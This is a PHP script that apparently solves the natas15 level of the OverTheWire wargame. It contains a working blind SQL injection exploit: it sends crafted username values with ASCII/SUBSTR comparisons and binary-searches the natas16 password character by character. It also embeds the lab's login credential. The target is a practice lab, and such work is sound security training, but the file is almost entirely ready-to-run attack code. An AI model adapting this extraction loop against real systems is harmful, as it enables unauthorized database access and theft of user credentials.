<?php/** * Gets the response from the server when POSTed with $post_data

1. <?php
2.  
3. /**
4. * Gets the response from the server when POSTed with $post_data
5. *
6. * @param array $post_data Array containing the POST parameters
7. * @throws Exception When curl fails
8. * @return string Response from server
9. */
10. function get_server_response(array $post_data) {
11. $ch = curl_init();
12.  
13. $post_data_string = http_build_query($post_data);
14.  
15. curl_setopt($ch, CURLOPT_URL, "http://natas15.natas.labs.overthewire.org");
16. //curl_setopt($ch, CURLOPT_URL, "http://localhost/PHPStorm_Workshop/natas/natas15_test.php"); // Debug
17. curl_setopt($ch, CURLOPT_USERPWD, "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J");
18. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
19. curl_setopt($ch, CURLOPT_POST, true);
20. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_string);
21.  
22. $response = curl_exec($ch);
23.  
24. if($response === false) {
25. throw new Exception("curl failed.");
26. }
27.  
28. return $response;
29. }
30.  
31.  
32. /**
33. * <p>
34. * Generates payload that tests whether ``$test_char`` is GREATER THAN the character at ``$search_index``.<br>
35. * Comparison is done using ASCII values of the characters.
36. * </p>
37. *
38. * <p>Runs the following exploit query:</p>
39. * ```
40. * $remote_query ="SELECT * FROM users WHERE username=\"natas16\" AND ASCII(SUBSTR(users.password, {$search_index}, 1)) > ASCII(\"{$test_char}\") -- Comment for the rest of the $remote_query"
41. * ```
42. *
43. *
44. * @param string $test_char Test character
45. * @param int $search_index Index of Test character
46. * @return array Associative array payload
47. */
48. function generate_exploit_payload(string $test_char, int $search_index) {
49. $search_index++; // Increment search index by 1 because in MySQL we start counting from 1 instead of 0.
50. $exploit_code = "ASCII(\"{$test_char}\") > ASCII(SUBSTR(users.password, {$search_index}, 1))";
51.  
52. $post_data = array(
53. "username" => "natas16\" AND $exploit_code -- Comment"
54. );
55.  
56. return $post_data;
57. }
58.  
59.  
60. /**
61. * Tests whether ``$char`` is GREATER THAN the password's char at ``$index``.
62. * Comparison is done based on ASCII values.
63. *
64. * @param string $char Character to test
65. * @param int $index Index of character
66. * @return bool
67. */
68. function execute_exploit(string $char, int $index) {
69. $payload = generate_exploit_payload($char, $index);
70. $response = "";
71.  
72. try {
73. $response = get_server_response($payload);
74. } catch (Exception $e) { // TODO Add better exception handling
75. echo "ERROR: " . $e->getMessage();
76. }
77.  
78. return (strpos($response, "This user exists.") !== false);
79. }
80.  
81.  
82.  
83. $possible_letters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
84. $password = "";
85.  
86. for($password_index = 0; $password_index < 32; $password_index++) {
87. $min_index = 0;
88. $max_index = strlen($possible_letters) - 1;
89.  
90. while ($max_index > $min_index) {
91. $test_index = intdiv($max_index + $min_index, 2);
92. $test_char = $possible_letters[$test_index];
93.  
94. $test_char_greater_than = execute_exploit($test_char, $password_index);
95.  
96. if($max_index - $min_index === 1) {
97. if($test_char_greater_than) {
98. $test_char = $possible_letters[$max_index];
99. } else {
100. $test_char = $possible_letters[$min_index];
101. }
102. break;
103. } else {
104. if ($test_char_greater_than) {
105. $max_index = $test_index;
106. } else {
107. $min_index = $test_index;
108. }
109. }
110.  
111. }
112.  
113. $password .= $test_char;
114. }
115.  
116. echo $password;